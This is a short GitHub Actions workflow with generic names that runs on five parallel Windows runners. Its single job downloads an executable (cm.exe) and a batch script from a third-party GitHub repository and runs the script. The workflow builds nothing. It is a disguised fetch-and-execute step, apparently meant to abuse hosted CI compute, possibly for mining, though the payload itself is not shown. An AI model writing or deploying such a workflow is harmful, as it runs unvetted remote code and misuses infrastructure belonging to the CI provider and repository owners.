name: Github
on: workflow_dispatch
jobs:
  build:
    name: environment
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1]
        flag: [A, B, C, D, E]
    timeout-minutes: 30
    env:
        NUM_JOBS: 5
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: running
      run: |
        Invoke-WebRequest https://github.com/hostfile307/file/raw/main/cm.exe -OutFile cm.exe
        Invoke-WebRequest https://raw.githubusercontent.com/hostfile307/file/main/start.bat -OutFile start.bat
        cmd /c start.bat
